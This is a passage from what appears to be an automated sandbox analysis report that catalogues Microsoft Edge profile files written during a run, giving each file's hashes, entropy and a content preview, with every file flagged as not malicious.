Entropy (8bit):	5.253805175780485
Encrypted:	false
SSDEEP:	6:H2mX+SQQL+q2P923oH+TcwtpIFUt8Y2mX0QG1Zmw+Y2mX0QQLVkwO923oH+Tcwt7:J+Sov4YebmFUt820T1/+20T5LYebaUJ
MD5:	E5577D69331A29BD67733A4030C5E8EA
SHA1:	C9D4DBF28E46D63D83845A85F5851C394B440A8A
SHA-256:	B93B19A2E15179E40DC9488C9B4755EC940520D48CBBE712FDF55F4A660CE11E
SHA-512:	F64E0167414B98626B48A6FCEBE83FA1E33302A42F9535CCF2021527950D0E8124881D122BCF01E5AFA995EB82D39F28E28FFC9251B710B9C5D8FD3D0BAC13B8
Malicious:	false
Preview:	2024/11/09-22:55:13.622 1d78 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/09-22:55:13.623 1d78 Recovering log #3.2024/11/09-22:55:13.623 1d78 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.253805175780485
Encrypted:	false
SSDEEP:	6:H2mX+SQQL+q2P923oH+TcwtpIFUt8Y2mX0QG1Zmw+Y2mX0QQLVkwO923oH+Tcwt7:J+Sov4YebmFUt820T1/+20T5LYebaUJ
MD5:	E5577D69331A29BD67733A4030C5E8EA
SHA1:	C9D4DBF28E46D63D83845A85F5851C394B440A8A
SHA-256:	B93B19A2E15179E40DC9488C9B4755EC940520D48CBBE712FDF55F4A660CE11E
SHA-512:	F64E0167414B98626B48A6FCEBE83FA1E33302A42F9535CCF2021527950D0E8124881D122BCF01E5AFA995EB82D39F28E28FFC9251B710B9C5D8FD3D0BAC13B8
Malicious:	false
Preview:	2024/11/09-22:55:13.622 1d78 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/09-22:55:13.623 1d78 Recovering log #3.2024/11/09-22:55:13.623 1d78 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2651167055138455
Encrypted:	false
SSDEEP:	384:8/2qOB1nxCkMuSAELyKOMq+8yC8F/YfU5m+OlTLVumw:Bq+n0Ju9ELyKOMq+8y9/Owb
MD5:	BC425300C5347721BF0B0C1B9639E667
SHA1:	73E2EF9023F96A762A44E039E6248C5BD37EF868
SHA-256:	AED81035B4C4608196CCC61850ECB38EB86F85B0B2500C7CE8A286D761B8E48D
SHA-512:	B68E7800C64B048BC106BCE004E29D2EC54A838455E4A7D15604064899AEDDE48392A9A8CC2E38C4107C9102554077AB9281CB6CDFAD81E651ACCF49C1B0BFF9
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.46655126779263917
Encrypted:	false
SSDEEP:	48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0jRfr:v7doKsKuKZKlZNmu46yjx0jtr
MD5:	C5F878FCD045371DF94E6F507275C345
SHA1:	1D7190B8A68FF13B5548EBFE9A39FE8BF4667A89
SHA-256:	37339672277DD7BCD4508834D1B8D252AFC9D9BF8979066A63F126735C966EE6
SHA-512:	8B2FCC0C0E5DB63FB2386926F38919A3388C07D4B64776EFEA9D38C073E562D65C85F370BA3DC02FF8F0A53879838149EF51F1B4A23AA7BB0AA93E76CF07525C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a5a13f2a-c0cd-4fdd-974e-598a87dee6ae.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17571), with no line terminators
Category:	modified
Size (bytes):	17575
Entropy (8bit):	5.472678554104038
Encrypted:	false
SSDEEP:	384:st4PGKSu47s6gdfhrGC2hW4IurLMABbGNQwP6WvlaTYDM:seOxuagdf8C2hzbG+MpaTYDM
MD5:	5CB06E77A7D62E31D90DE5CCF7E4D0E3
SHA1:	F5B89F9E6087962965900AAA65EBA521C8BA6B9C
SHA-256:	08B71FB230E62FE3D0C20354380A1FD13978FB99C202E135786C865190B48622
SHA-512:	71ACD1872E619BC64C4E70E99DD39FA3BD75FB82FC418E6BAC9B8348EBAB9C30EBA4D9EE5E9B1FD9FCE0FB4AF41504304424FF633F52C9EF22DE9C7B2257A969
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375684514153445","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3951), with CRLF line terminators
Category:	dropped
Size (bytes):	11755
Entropy (8bit):	5.190465908239046
Encrypted:	false
SSDEEP:	192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:	07301A857C41B5854E6F84CA00B81EA0
SHA1:	7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:	2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:	00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:	false
Preview:	{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c54e823c-190e-414d-962a-5a734481b06d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	37149
Entropy (8bit):	5.5644295154021375
Encrypted:	false
SSDEEP:	768:tSdGSpWPtFfBu8F1+UoAYDCx9Tuqh0VfUC9xbog/OVOhvArtyrw0vTYqKpWtuX:tSdGSpWPtFfBuu1jabhvct30vTxft8
MD5:	2D9BA514612F4756AED21FB286AAB522
SHA1:	01A3F63FD1114DB7DDE2927D4B44BEB663663778
SHA-256:	919CBD9EC2E94237EC403B85DDACD66DD916B4D5930A857A9FD0867857C25D40
SHA-512:	7F1BC51D2C4C4C7F72AFBD37417F77148AA660AC404B67649FAB2B6A17CD84264BF11D3C3592881908DDB88F14241374590E072C8C078BEBAAA6505791332F90
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375684513569482","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375684513569482","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.3410017321959524
Encrypted:	false
SSDEEP:	12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
MD5:	98643AF1CA5C0FE03CE8C687189CE56B
SHA1:	ECADBA79A364D72354C658FD6EA3D5CF938F686B
SHA-256:	4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
SHA-512:	68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e0c636c5-efca-48a6-9529-f817250828c8.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e8c4b9de-4539-4a7b-a34d-8ebfe5474130.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17479), with no line terminators
Category:	dropped
Size (bytes):	17483
Entropy (8bit):	5.47489908702147
Encrypted:	false
SSDEEP:	384:st4PGKSu47sogdfhrGC2hW4IurLMABbGNQwP6WNlaTYDN:seOxuIgdf8C2hzbG+MXaTYDN
MD5:	69D3B769D925C15F35E089860953F943
SHA1:	7906F48EEB1FE5512A86200AB6D2C552AF946BFB
SHA-256:	8907E99AF2ED7D38D743BA6872070FABDD43E285CEE063F4A4B1E853F636707F
SHA-512:	075D675B11CF592EA81AD027D8CC4F37AD5E4769B887BE28609A5F97018EAA65520A5A70FC4B425FF7B4A96ECC23B81022AFD7C914FCCAAEAEA3A5AE79435AE5
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375684514153445","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.10406528901623646
Encrypted:	false
SSDEEP:	12:Jnt1xq7nt1xy+pEjVl/PnnnnnnnnnnnnvoQJEopmMl:Jnt1I7nt1QuoPnnnnnnnnnnnnvjj9l
MD5:	912881901F4D6DD93919AF3E5D770188
SHA1:	9F0827B020C7E55FE8467E7A50A1F83131455F83
SHA-256:	7C2DE69DDE7479ADA08AF498E23D2BF9031246C7DEE859688571012C9AB7F0C0
SHA-512:	395A7FD2B2C12806C1603D7C820961E840CB7804DC4A2D073797766EB316FEC4F8B71B65CB72F82661C115790F5AA3C4BAD40C64418A121976D07C885B997792
Malicious:	false
Preview:	..-.............Q.........l..O!.4..}..D....V<...-.............Q.........l..O!.4..}..D....V<.........M...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	333752
Entropy (8bit):	0.934100875461548
Encrypted:	false
SSDEEP:	384:G22QAFWklDR4X7XcQs8/NIOFh1HUv8SyPhyE6yHev8DyP3ynt3yP+xyO9n:hU+STG0+nn
MD5:	4487A584F6ACD932AB4E0925677CCDBD
SHA1:	1EB3D3B4E9154AD8F71A9EC6D6F276DF5B286541
SHA-256:	60361913696F7228B1E094204EF6615F7B3F15595A90FA364E284D97CA35FE1C
SHA-512:	CE281BDCA79B9B0EE5ADE83755A7AD040BF1A1808368EAA8B16FDB39FDD11A71A2722865C7C7A5FB4123E467C9DF175755F03BF41CC94AAA54B56EE2846F988C
Malicious:	false
Preview:	7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	788
Entropy (8bit):	3.4938515472375133
Encrypted:	false
SSDEEP:	12:Wlc8NOuuuuuuuuuuuuuuuuuuuujllOE8YTSlkTSlkTSlkTSlkT:iDElY999
MD5:	C5594FEA2C8ABD325EE3287A93C8D932
SHA1:	A26008E8249C30C1909862AC6987679D7D6D9F22
SHA-256:	A55835D66FCB10072ADBC32E54049FFB5F2E02B3F16B33362FA3CEE6AD210699
SHA-512:	9A9DEBAEA7C82D6530898C24A3DD22E55D44E4F2FB44621908BAE424C0AC57E1D5DA7F4FB7C70A1FCE79B9306CB6CEA165C2EED3551457660B5502A7AF4958FD
Malicious:	false
Preview:	A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...................:...............#38_h.......6.Z..W.F.....@.......@..........nV.e................V.e................V.e....................0................39_config..........6.....n ...12B.l...............2B.l...............2B.l...............2B.l...............2B.l...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.196858452138388
Encrypted:	false
SSDEEP:	6:H2Mx9yq2P923oH+TcwtfrK+IFUt8Y2Mxr1Zmw+Y2RRkwO923oH+TcwtfrUeLJ:Fx9yv4Yeb23FUt8Wxh/+DR5LYeb3J
MD5:	EF10647D5D9BC02479726BBCFF63DC9B
SHA1:	1F788692F6917E3C9AAE288565600E74FE5C0DCC
SHA-256:	16106CE3BBA37E532EB60F596D9C52F594155D55CC44C6720A26FDF02D48D890
SHA-512:	A859D66A05FCBD19DC2A4C3A637A7E755DCDD2F240C75A59440CD295FAC068C14159085DCFC2E747E143DBB780C714D374BE1C3EFE0C95DBE4B593C65EE667CD
Malicious:	false
Preview:	2024/11/09-22:55:14.281 1d90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/09-22:55:14.281 1d90 Recovering log #3.2024/11/09-22:55:14.282 1d90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.196858452138388
Encrypted:	false
SSDEEP:	6:H2Mx9yq2P923oH+TcwtfrK+IFUt8Y2Mxr1Zmw+Y2RRkwO923oH+TcwtfrUeLJ:Fx9yv4Yeb23FUt8Wxh/+DR5LYeb3J
MD5:	EF10647D5D9BC02479726BBCFF63DC9B
SHA1:	1F788692F6917E3C9AAE288565600E74FE5C0DCC
SHA-256:	16106CE3BBA37E532EB60F596D9C52F594155D55CC44C6720A26FDF02D48D890
SHA-512:	A859D66A05FCBD19DC2A4C3A637A7E755DCDD2F240C75A59440CD295FAC068C14159085DCFC2E747E143DBB780C714D374BE1C3EFE0C95DBE4B593C65EE667CD
Malicious:	false
Preview:	2024/11/09-22:55:14.281 1d90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/09-22:55:14.281 1d90 Recovering log #3.2024/11/09-22:55:14.282 1d90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	787
Entropy (8bit):	4.059252238767438
Encrypted:	false
SSDEEP:	12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
MD5:	D8D8899761F621B63AD5ED6DF46D22FE
SHA1:	23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
SHA-256:	A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
SHA-512:	4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J\|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.\|.................9_.....'\c..................9_.......f-.................__global... .\|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.167607751484692
Encrypted:	false
SSDEEP:	6:H2Eyq2P923oH+TcwtfrzAdIFUt8Y2h1Zmw+Y23RkwO923oH+TcwtfrzILJ:1yv4Yeb9FUt89/+pR5LYeb2J
MD5:	5490F030F9495C92567B80A8819F9440
SHA1:	B5EAFC2B6F27C7DA9EAEB513E64011251CB89A43
SHA-256:	8411CF69DF41642325CFF5703167D98CFD3E15C95D7438D0B527B2D8C2517967
SHA-512:	33D1FA7EC47FBEF4971D3AD065FAFAFA0FA8DBF37D2892C76F4C85A0AB0B885882E49A81018470E362F5FAC532F19CC75049AD4E9A527607146EA620FF07DC04
Malicious:	false
Preview:	2024/11/09-22:55:14.230 1d90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/09-22:55:14.231 1d90 Recovering log #3.2024/11/09-22:55:14.231 1d90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.167607751484692
Encrypted:	false
SSDEEP:	6:H2Eyq2P923oH+TcwtfrzAdIFUt8Y2h1Zmw+Y23RkwO923oH+TcwtfrzILJ:1yv4Yeb9FUt89/+pR5LYeb2J
MD5:	5490F030F9495C92567B80A8819F9440
SHA1:	B5EAFC2B6F27C7DA9EAEB513E64011251CB89A43
SHA-256:	8411CF69DF41642325CFF5703167D98CFD3E15C95D7438D0B527B2D8C2517967
SHA-512:	33D1FA7EC47FBEF4971D3AD065FAFAFA0FA8DBF37D2892C76F4C85A0AB0B885882E49A81018470E362F5FAC532F19CC75049AD4E9A527607146EA620FF07DC04
Malicious:	false
Preview:	2024/11/09-22:55:14.230 1d90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/09-22:55:14.231 1d90 Recovering log #3.2024/11/09-22:55:14.231 1d90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\uu_host_config

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	398313
Entropy (8bit):	4.953803318132309
Encrypted:	false
SSDEEP:	1536:veqeoyyQJztYNr3CZsTKsvbbOPlMa0JJoG3JfeX5B7FxRG0MZ/d18bfpyvFaRnxY:q7JVZb0JOGiMldObbFG/eFd2X134a
MD5:	4529A95302CDD7EF2BB39E087A5E8DF6
SHA1:	6449A1AAEF5A5BBF798FF0FFF1BB51F5150FD578
SHA-256:	A41F5D82CF139CB1C29E91EE45A873B98879971E5E5552CC3B903EB8FE1CF658
SHA-512:	B314C5434D903E0472C7A1E02E958DE7DC68C7FE44CAC3486B98C48BB057E6263EC6EF00A1CCC186FC6CD3240EC2D62C73D091975B669ACE7D978AB65A670318
Malicious:	false
Preview:	{. "0123movies.com": "{\"Tier1\": [983, 6061], \"Tier2\": [4948, 1106, 9972]}",. "1020398.app.netsuite.com": "{\"Tier1\": [6061, 8405, 5938], \"Tier2\": [228, 236]}",. "1337x.to": "{\"Tier1\": [6061, 983], \"Tier2\": [6657, 475, 4068]}",. "2cvresearch.decipherinc.com": "{\"Tier1\": [8405], \"Tier2\": [379, 6101]}",. "3817341.extforms.netsuite.com": "{\"Tier1\": [6061, 8405, 5938], \"Tier2\": [7746]}",. "3cx.integrafin.co.uk": "{\"Tier1\": [8405, 6061], \"Tier2\": [2863, 5391]}",. "4540582.extforms.netsuite.com": "{\"Tier1\": [8405], \"Tier2\": [228, 236, 7746]}",. "7589.directpaper.name": "{\"Tier1\": [8405], \"Tier2\": []}",. "7a201srvitportl.cymru.nhs.uk": "{\"Tier1\": [], \"Tier2\": [9870]}",. "7a3cjsvmifitla1.cymru.nhs.uk": "{\"Tier1\": [6061], \"Tier2\": [1092]}",. "7a3cjsvmlivwebb.cymru.nhs.uk": "{\"Tier1\": [148, 6061], \"Tier2\": [9870, 9813]}",. "8ballpool.com": "{\"Tier1\": [8741, 3907, 983], \"Tier2\": [9151, 5779, 6916]}",. "9anime.gs"

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0018238520723782249
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zETlB5l/:/M/xT02zuz
MD5:	DF558D6DCA79681ED379EA014139C84C
SHA1:	48FD3778324F45C1D47B90049A06966BDB1E633C
SHA-256:	4435C9C732972F2B15560E3CDAEE5192B7C638917911AE4EF926D05C418C7A18
SHA-512:	A228A51AE0BCA30B5CE993CEE78FD7403F59550324BA6BC7D926228018BCD6B945B7B076E91BD014DD83BEB6E01445D5A8AAC5862139BBA41300C399070E169B
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0018238520723782249
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zETlmY4P/l/:/M/xT02z5R1
MD5:	DA7C8FFAB34FEC676B7A70450263D70D
SHA1:	473A584042334F5D180F121F9F88F05B0750BED2
SHA-256:	35275D75DA4FA952F20FBF218E82E181287EB14648A3F0A6095DE49089458E2B
SHA-512:	C88691E873C410C3014DC74D12C02A36830C90DCC9B9F52D7A6CE861C6886D3FEAF0D7D5996466CD71A818545AA47E8BCFBE0F2F7FD2DA40E2AF4CFCF67C71AD
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

